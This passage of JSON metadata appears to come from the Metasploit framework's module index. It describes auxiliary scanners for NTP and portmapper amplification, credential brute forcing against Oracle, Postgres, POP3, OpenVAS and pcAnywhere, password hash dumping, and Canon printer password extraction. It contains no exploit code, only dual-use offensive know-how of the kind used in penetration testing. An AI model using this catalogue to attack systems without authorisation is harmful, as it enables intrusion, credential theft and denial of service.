"URL-https://github.com/rapid7/metasploit-framework/pull/3696",
"URL-http://r-7.co/R7-2014-12"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_req_nonce_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_reslist_dos": {
"name": "NTP Mode 7 GET_RESTRICT DRDoS Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_reslist_dos",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module identifies NTP servers which permit \"reslist\" queries and\n obtains the list of restrictions placed on various network interfaces,\n networks or hosts. The reslist feature allows remote\n attackers to cause a distributed, reflected denial of service (aka, \"DRDoS\" or\n traffic amplification) via spoofed requests. The more interfaces, networks\n or hosts with specific restrictions, the greater the amplification.",
"references": [
"CVE-2013-5211",
"URL-https://github.com/rapid7/metasploit-framework/pull/3696",
"URL-http://r-7.co/R7-2014-12"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_reslist_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ntp/ntp_unsettrap_dos": {
"name": "NTP Mode 6 UNSETTRAP DRDoS Scanner",
"full_name": "auxiliary/scanner/ntp/ntp_unsettrap_dos",
"rank": 300,
"disclosure_date": "2014-08-25",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "This module identifies NTP servers which permit mode 6 UNSETTRAP requests that\n can be used to conduct DRDoS attacks. In some configurations, NTP servers will\n respond to UNSETTRAP requests with multiple packets, allowing remote attackers\n to cause a distributed, reflected denial of service (aka, \"DRDoS\" or traffic\n amplification) via spoofed requests.",
"references": [
"CVE-2013-5211",
"URL-https://github.com/rapid7/metasploit-framework/pull/3696",
"URL-http://r-7.co/R7-2014-12"
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb",
"is_install_path": true,
"ref_name": "scanner/ntp/ntp_unsettrap_dos",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/openvas/openvas_gsad_login": {
"name": "OpenVAS gsad Web Interface Login Utility",
"full_name": "auxiliary/scanner/openvas/openvas_gsad_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module simply attempts to login to an OpenVAS gsad interface\n using a specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb",
"is_install_path": true,
"ref_name": "scanner/openvas/openvas_gsad_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/openvas/openvas_omp_login": {
"name": "OpenVAS OMP Login Utility",
"full_name": "auxiliary/scanner/openvas/openvas_omp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module attempts to authenticate to an OpenVAS OMP service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 9390,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-25 09:10:10 +0000",
"path": "/modules/auxiliary/scanner/openvas/openvas_omp_login.rb",
"is_install_path": true,
"ref_name": "scanner/openvas/openvas_omp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/openvas/openvas_otp_login": {
"name": "OpenVAS OTP Login Utility",
"full_name": "auxiliary/scanner/openvas/openvas_otp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>"
],
"description": "This module attempts to authenticate to an OpenVAS OTP service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 9391,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-25 09:10:10 +0000",
"path": "/modules/auxiliary/scanner/openvas/openvas_otp_login.rb",
"is_install_path": true,
"ref_name": "scanner/openvas/openvas_otp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/emc_sid": {
"name": "Oracle Enterprise Manager Control SID Discovery",
"full_name": "auxiliary/scanner/oracle/emc_sid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module makes a request to the Oracle Enterprise Manager Control Console\n in an attempt to discover the SID.",
"references": [
"URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf"
],
"platform": "",
"arch": "",
"rport": 1158,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/oracle/emc_sid.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/emc_sid",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/isqlplus_login": {
"name": "Oracle iSQL*Plus Login Utility",
"full_name": "auxiliary/scanner/oracle/isqlplus_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>",
"todb <todb@metasploit.com>"
],
"description": "This module attempts to authenticate against an Oracle iSQL*Plus\n administration web site using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n\n This module does not require a valid SID, but if one is defined, it will be used.\n Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to\n fingerprint the version and automatically select the correct POST request.",
"references": [
"URL-http://carnal0wnage.attackresearch.com"
],
"platform": "",
"arch": "",
"rport": 5560,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/oracle/isqlplus_login.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/isqlplus_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/isqlplus_sidbrute": {
"name": "Oracle iSQLPlus SID Check",
"full_name": "auxiliary/scanner/oracle/isqlplus_sidbrute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>",
"todb <todb@metasploit.com>"
],
"description": "This module attempts to bruteforce the SID on the Oracle application server iSQL*Plus\n login pages. It does this by testing Oracle error responses returned in the HTTP response.\n Incorrect username/pass with a correct SID will produce an Oracle ORA-01017 error.\n Works against Oracle 9.2, 10.1 & 10.2 iSQL*Plus. This module will attempt to\n fingerprint the version and automatically select the correct POST request.",
"references": [
"URL-http://carnal0wnage.attackresearch.com"
],
"platform": "",
"arch": "",
"rport": 5560,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/isqlplus_sidbrute",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/oracle_hashdump": {
"name": "Oracle Password Hashdump",
"full_name": "auxiliary/scanner/oracle/oracle_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module dumps the usernames and password hashes\n from Oracle given the proper credentials and SID.\n These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast.\n This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.",
"references": [
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-28 10:06:56 +0000",
"path": "/modules/auxiliary/scanner/oracle/oracle_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/oracle_hashdump",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/oracle/oracle_login": {
"name": "Oracle RDBMS Login Utility",
"full_name": "auxiliary/scanner/oracle/oracle_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>",
"todb <todb@metasploit.com>"
],
"description": "This module attempts to authenticate against an Oracle RDBMS\n instance using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.",
"references": [
"URL-http://www.oracle.com/us/products/database/index.html",
"CVE-1999-0502",
"URL-http://nmap.org/nsedoc/scripts/oracle-brute.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/oracle/oracle_login.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/oracle_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/sid_brute": {
"name": "Oracle TNS Listener SID Bruteforce",
"full_name": "auxiliary/scanner/oracle/sid_brute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module queries the TNS listener for a valid Oracle database\n instance name (also known as a SID).\n Any response other than a \"reject\" will be considered a success.\n If a specific SID is provided, that SID will be attempted. Otherwise,\n SIDs read from the named file will be attempted in sequence instead.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-04-26 08:36:32 +0000",
"path": "/modules/auxiliary/scanner/oracle/sid_brute.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/sid_brute",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/sid_enum": {
"name": "Oracle TNS Listener SID Enumeration",
"full_name": "auxiliary/scanner/oracle/sid_enum",
"rank": 300,
"disclosure_date": "2009-01-07",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>",
"MC <mc@metasploit.com>"
],
"description": "This module simply queries the TNS listener for the Oracle SID.\n With Oracle 9.2.0.8 and above the listener will be protected and\n the SID will have to be bruteforced or guessed.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/oracle/sid_enum.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/sid_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/spy_sid": {
"name": "Oracle Application Server Spy Servlet SID Enumeration",
"full_name": "auxiliary/scanner/oracle/spy_sid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module makes a request to the Oracle Application Server\n in an attempt to discover the SID.",
"references": [
"URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf"
],
"platform": "",
"arch": "",
"rport": 1158,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/oracle/spy_sid.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/spy_sid",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/tnslsnr_version": {
"name": "Oracle TNS Listener Service Version Query",
"full_name": "auxiliary/scanner/oracle/tnslsnr_version",
"rank": 300,
"disclosure_date": "2009-01-07",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module simply queries the tnslsnr service for the Oracle build.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/oracle/tnslsnr_version.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/tnslsnr_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/tnspoison_checker": {
"name": "Oracle TNS Listener Checker",
"full_name": "auxiliary/scanner/oracle/tnspoison_checker",
"rank": 300,
"disclosure_date": "2012-04-18",
"type": "auxiliary",
"author": [
"ir0njaw (Nikita Kelesis) <nikita.elkey@gmail.com>"
],
"description": "This module checks the server for vulnerabilities like TNS Poison.\n The module sends the server a packet with a command to register a new TNS Listener and checks\n for a response indicating an error. If the registration results in an error, the target is not\n vulnerable. Otherwise, the target is vulnerable to malicious registrations.",
"references": [
"CVE-2012-1675",
"URL-https://seclists.org/fulldisclosure/2012/Apr/204"
],
"platform": "",
"arch": "",
"rport": 1521,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/oracle/tnspoison_checker.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/tnspoison_checker",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/xdb_sid": {
"name": "Oracle XML DB SID Discovery",
"full_name": "auxiliary/scanner/oracle/xdb_sid",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module simply makes an authenticated request to retrieve\n the sid from the Oracle XML DB httpd server.",
"references": [
"URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/oracle/xdb_sid.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/xdb_sid",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/oracle/xdb_sid_brute": {
"name": "Oracle XML DB SID Discovery via Brute Force",
"full_name": "auxiliary/scanner/oracle/xdb_sid_brute",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nebulus"
],
"description": "This module attempts to retrieve the sid from the Oracle XML DB httpd server,\n utilizing Pete Finnigan's default oracle password list.",
"references": [
"URL-http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf",
"URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb",
"is_install_path": true,
"ref_name": "scanner/oracle/xdb_sid_brute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/pcanywhere/pcanywhere_login": {
"name": "PcAnywhere Login Scanner",
"full_name": "auxiliary/scanner/pcanywhere/pcanywhere_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will test pcAnywhere logins on a range of machines and\n report successful logins.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 5631,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb",
"is_install_path": true,
"ref_name": "scanner/pcanywhere/pcanywhere_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/pcanywhere/pcanywhere_tcp": {
"name": "PcAnywhere TCP Service Discovery",
"full_name": "auxiliary/scanner/pcanywhere/pcanywhere_tcp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Discover active pcAnywhere services through TCP",
"references": [
],
"platform": "",
"arch": "",
"rport": 5631,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb",
"is_install_path": true,
"ref_name": "scanner/pcanywhere/pcanywhere_tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/pcanywhere/pcanywhere_udp": {
"name": "PcAnywhere UDP Service Discovery",
"full_name": "auxiliary/scanner/pcanywhere/pcanywhere_udp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Discover active pcAnywhere services through UDP",
"references": [
"URL-http://www.unixwiz.net/tools/pcascan.txt"
],
"platform": "",
"arch": "",
"rport": 5632,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb",
"is_install_path": true,
"ref_name": "scanner/pcanywhere/pcanywhere_udp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/pop3/pop3_login": {
"name": "POP3 Login Utility",
"full_name": "auxiliary/scanner/pop3/pop3_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Heyder Andrade <heyder@alligatorteam.org>"
],
"description": "This module attempts to authenticate to a POP3 service.",
"references": [
"URL-http://www.ietf.org/rfc/rfc1734.txt",
"URL-http://www.ietf.org/rfc/rfc1939.txt"
],
"platform": "",
"arch": "",
"rport": 110,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-14 11:05:54 +0000",
"path": "/modules/auxiliary/scanner/pop3/pop3_login.rb",
"is_install_path": true,
"ref_name": "scanner/pop3/pop3_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/pop3/pop3_version": {
"name": "POP3 Banner Grabber",
"full_name": "auxiliary/scanner/pop3/pop3_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "POP3 Banner Grabber",
"references": [
],
"platform": "",
"arch": "",
"rport": 110,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/pop3/pop3_version.rb",
"is_install_path": true,
"ref_name": "scanner/pop3/pop3_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portmap/portmap_amp": {
"name": "Portmapper Amplification Scanner",
"full_name": "auxiliary/scanner/portmap/portmap_amp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module can be used to discover Portmapper services which can be used in an\n amplification DDoS attack against a third party.",
"references": [
"CVE-2013-5211",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-017A",
"URL-http://blog.level3.com/security/a-new-ddos-reflection-attack-portmapper-an-early-warning-to-the-industry/"
],
"platform": "",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/portmap/portmap_amp.rb",
"is_install_path": true,
"ref_name": "scanner/portmap/portmap_amp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portscan/ack": {
"name": "TCP ACK Firewall Scanner",
"full_name": "auxiliary/scanner/portscan/ack",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Map out firewall rulesets with a raw ACK scan. Any\n unfiltered ports found mean a stateful firewall is\n not in place for them.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/portscan/ack.rb",
"is_install_path": true,
"ref_name": "scanner/portscan/ack",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portscan/ftpbounce": {
"name": "FTP Bounce Port Scanner",
"full_name": "auxiliary/scanner/portscan/ftpbounce",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Enumerate TCP services via the FTP bounce PORT/LIST\n method.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/portscan/ftpbounce.rb",
"is_install_path": true,
"ref_name": "scanner/portscan/ftpbounce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portscan/syn": {
"name": "TCP SYN Port Scanner",
"full_name": "auxiliary/scanner/portscan/syn",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Enumerate open TCP services using a raw SYN scan.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/portscan/syn.rb",
"is_install_path": true,
"ref_name": "scanner/portscan/syn",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portscan/tcp": {
"name": "TCP Port Scanner",
"full_name": "auxiliary/scanner/portscan/tcp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Enumerate open TCP services by performing a full TCP connect on each port.\n This does not need administrative privileges on the source machine, which\n may be useful if pivoting.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/portscan/tcp.rb",
"is_install_path": true,
"ref_name": "scanner/portscan/tcp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/portscan/xmas": {
"name": "TCP \"XMas\" Port Scanner",
"full_name": "auxiliary/scanner/portscan/xmas",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Enumerate open|filtered TCP services using a raw\n \"XMas\" scan; this sends probes containing the FIN,\n PSH and URG flags.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/portscan/xmas.rb",
"is_install_path": true,
"ref_name": "scanner/portscan/xmas",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/postgres/postgres_dbname_flag_injection": {
"name": "PostgreSQL Database Name Command Line Flag Injection",
"full_name": "auxiliary/scanner/postgres/postgres_dbname_flag_injection",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can identify PostgreSQL 9.0, 9.1, and 9.2 servers that are\n vulnerable to command-line flag injection through CVE-2013-1899. This\n can lead to denial of service, privilege escalation, or even arbitrary\n code execution.",
"references": [
"CVE-2013-1899",
"URL-http://www.postgresql.org/support/security/faq/2013-04-04/"
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_dbname_flag_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/postgres/postgres_hashdump": {
"name": "Postgres Password Hashdump",
"full_name": "auxiliary/scanner/postgres/postgres_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts the usernames and encrypted password\n hashes from a Postgres server and stores them for later cracking.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_hashdump",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/postgres/postgres_login": {
"name": "PostgreSQL Login Utility",
"full_name": "auxiliary/scanner/postgres/postgres_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module attempts to authenticate against a PostgreSQL\n instance using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that\n passwords may be either plaintext or MD5 formatted hashes.",
"references": [
"URL-http://www.postgresql.org",
"CVE-1999-0502",
"URL-https://hashcat.net/forum/archive/index.php?thread-4148.html"
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/postgres/postgres_schemadump": {
"name": "Postgres Schema Dump",
"full_name": "auxiliary/scanner/postgres/postgres_schemadump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts the schema information from a\n Postgres server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_schemadump.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_schemadump",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/postgres/postgres_version": {
"name": "PostgreSQL Version Probe",
"full_name": "auxiliary/scanner/postgres/postgres_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "Enumerates the version of PostgreSQL servers.",
"references": [
"URL-http://www.postgresql.org"
],
"platform": "",
"arch": "",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_version.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_version",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/printer/canon_iradv_pwd_extract": {
"name": "Canon IR-Adv Password Extractor",
"full_name": "auxiliary/scanner/printer/canon_iradv_pwd_extract",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"Percentx\" Heiland",
"Pete \"Bokojan\" Arzamendi",
"wvu <wvu@metasploit.com>",
"Dev Mohanty"
],
"description": "This module will extract the passwords from address books on various Canon IR-Adv mfp devices.\n Tested models:\n iR-ADV C2030,\n iR-ADV 4045,\n iR-ADV C5030,\n iR-ADV C5235,\n iR-ADV C5240,\n iR-ADV 6055,\n iR-ADV C7065",
"references": [
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-22 17:01:49 +0000",
"path": "/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb",
"is_install_path": true,
"ref_name": "scanner/printer/canon_iradv_pwd_extract",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/printer/printer_delete_file": {
"name": "Printer File Deletion Scanner",
"full_name": "auxiliary/scanner/printer/printer_delete_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"MC <mc@metasploit.com>",
"Myo Soe",
"Matteo Cantoni <goony@nothink.org>"
],
